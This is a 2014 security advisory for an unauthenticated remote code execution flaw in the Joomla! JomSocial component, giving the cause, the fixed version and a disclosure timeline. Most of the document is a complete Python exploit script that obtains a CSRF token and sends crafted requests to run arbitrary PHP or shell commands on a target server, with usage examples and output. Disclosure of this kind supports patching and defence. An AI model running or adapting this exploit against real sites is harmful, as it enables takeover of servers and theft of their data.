---

Joomla! JomSocial component < 3.1.0.1 - Remote code execution

== Description ==

• Software link: http://www.jomsocial.com/
• Affected versions: All versions >= 2.6 and < 3.1.0.1 are vulnerable.
• Vulnerability discovered by: Matias Fontanini and Gaston Traberg

== Vulnerability ==
The vulnerability is located in the "photos" controller,
"ajaxUploadAvatar" task. The parameters parsed by the "Azrul" plugin are
not properly sanitized before being used in a call to the
"call_user_func_array" PHP function. This allows an attacker to execute
arbitrary static class functions, using any amount of user-provided
parameters. This can be leveraged by calling the "escape" method in the
"CStringHelper" class to execute arbitrary PHP code.

In order to exploit the vulnerability, no authentication is required.

== Proof of concept ==
See the attached python script which allows executing arbitrary code on
a Jommla! application which has the JomSocial component installed.

== Solution ==
Upgrade the product to the 3.1.0.1 version.

== Report timeline ==
[2013-12-12] Vulnerability reported to vendor.
[2013-12-12] Developers answered back.
[2013-12-23] JomSocial 3.1.0.1 was released, which fixes the the
reported issue.
[2014-01-30] Public disclosure.

exploit.py

#!/usr/bin/python

Joomla! JomSocial component >= 2.6 PHP code execution exploit

Authors:

- Matias Fontanini

- Gaston Traberg

This exploit allows the execution of PHP code without any prior

authentication on the Joomla! JomSocial component.

Note that in order to be able to execute PHP code, both the "eval"

and "assert" functions must be enabled. It is also possible to execute

arbitrary PHP functions, without using them. Therefore, it is possible

to execute shell commands using "system", "passthru", etc, as long

as they are enabled.

Examples:

Execute PHP code:

./exploit.py -u http://example.com/index.php -p "echo 'Hello World!';"

./exploit.py -u http://example.com/index.php -p /tmp/script_to_execute.php

Execute shell commands(using system()):

./exploit.py -u http://example.com/index.php -s "netstat -n"

Exploit shell commands(using a user provided function, passthru in this case)

./exploit.py -u http://example.com/joomla/index.php -s "netstat -natp" -c passthru

Exploit execution example:

$ python exploit.py -u http://example.com/index.php -p 'var_dump("Hello World!");'

[i] Retrieving cookies and anti-CSRF token… Done

[+] Executing PHP code…

string(12) "Hello World!"

import urllib, urllib2, re, argparse, sys, os

class Exploit:
token_request_data = 'option=com_community&view=frontpage'
exploit_request_data = 'option=community&no_html=1&task=azrul_ajax&func=photos,ajaxUploadAvatar&{0}=1&arg2=["d","Event"]&arg3=["d","374"]&arg4=["d","{1}"]'
json_data = '{{"call":["CStringHelper","escape", "{1}","{0}"]}}'

def __init__(self, url, user_agent = None, use_eval = True):
    self.url = url
    self._set_user_agent(user_agent)
    self.use_eval = use_eval
    self.token_regex = re.compile('<input type=\"hidden\" name=\"([\w\d]{32})\" value=\"1\" \/>')
    self.cookie, self.token = self._retrieve_token()
    self.result_regex = re.compile('method=\\\\"POST\\\\" enctype=\\\\"multipart\\\\/form-data\\\\"><br>(.*)<div id=\\\\"avatar-upload\\\\">', re.DOTALL)
    self.command_regex = re.compile('(.*)\\[\\["as","ajax_calls","d",""\\]', re.DOTALL)

def _set_user_agent(self, user_agent):
    self.user_agent = user_agent

def _make_opener(self, add_cookie = True):
    opener = urllib2.build_opener()
    if add_cookie:
        opener.addheaders.append(('Cookie', self.cookie))
    opener.addheaders.append(('Referer', self.url))
    if self.user_agent:
        opener.addheaders.append(('User-Agent', self.user_agent))
    return opener

def _retrieve_token(self):
    opener = self._make_opener(False)
    sys.stdout.write('[i] Retrieving cookies and anti-CSRF token... ')
    sys.stdout.flush()
    req = opener.open(self.url, Exploit.token_request_data)
    data = req.read()
    token = self.token_regex.findall(data)
    if len(token) < 1:
        print 'Failed'
        raise Exception("Could not retrieve anti-CSRF token")
    print 'Done'
    return (req.headers['Set-Cookie'], token[0])

def _do_call_function(self, function, parameter):
    parameter = parameter.replace('"', '\\"')
    json_data = Exploit.json_data.format(function, parameter)
    json_data = urllib2.quote(json_data)
    data = Exploit.exploit_request_data.format(self.token, json_data)
    opener = self._make_opener()
    req = opener.open(self.url, data)
    if function == 'assert':
        return req.read()
    elif function in ['system', 'passthru']:
        result = self.command_regex.findall(req.read())
        if len(result) == 1:
            return result[0]
        else:
            return "[+] Error executing command."
    else:
        result = self.result_regex.findall(req.read())
        if len(result) == 1:
            return result[0].replace('\\/', '/').replace('\\"', '"').replace('\\n', '\n')
        else:
            return "[+] Error executing command."

def call_function(self, function, parameter):
    if self.use_eval:
        return self.eval("echo {0}('{1}')".format(function, parameter))
    else:
        return self._do_call_function(function, parameter)

def disabled_functions(self):
    return self.call_function("ini_get", "disable_functions")

def test_injection(self):
    result = self.eval("echo 'HELLO' . ' - ' . 'WORLD';")
    if 'HELLO - WORLD' in result:
        print "[+] Code injection using eval works"
    else:
        print "[+] Code injection doesn't work. Try executing shell commands."

def eval(self, code):
    if code [-1] != ';':
        code = code + ';'
    return self._do_call_function('assert', "@exit(@eval(@base64_decode('{0}')));".format(code.encode('base64').replace('\n', '')))

parser = argparse.ArgumentParser(
description="JomSocial >= 2.6 - Code execution exploit"
)
parser.add_argument('-u', '–url', help='the base URL', required=True)
parser.add_argument(
'-p',
'–php-code',
help='the PHP code to execute. Use \'-\' to read from stdin, or provide a file path to read from')
parser.add_argument('-s', '–shell-command', help='the shell command to execute')
parser.add_argument('-c', '–shell-function', help='the PHP function to use when executing shell commands', default="system")
parser.add_argument('-t', '–test', action='store_true', help='test the PHP code injection using eval', default=False)
parser.add_argument('-n', '–no-eval', action='store_false', help='don\'t use eval when executing shell commands', default=True)

args = parser.parse_args()
if not args.test and not args.php_code and not args.shell_command:
print '[-] Need -p, -t or -s to do something…'
exit(1)
url = args.url
try:
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
exploit = Exploit(url, use_eval=args.no_eval)
if args.test:
exploit.test_injection()
elif args.php_code:
code = args.php_code
if args.php_code == '-':
print '[i] Enter the code to be executed:'
code = sys.stdin.read()
elif os.path.isfile(code):
try:
fd = open(code)
code = fd.read()
fd.close()
except Exception:
print "[-] Error reading the file."
exit(1)
print '[+] Executing PHP code…'
print exploit.eval(code)
elif args.shell_command:
print exploit.call_function(args.shell_function, args.shell_command)
except Exception as ex:
print '[+] Error: ' + str(ex)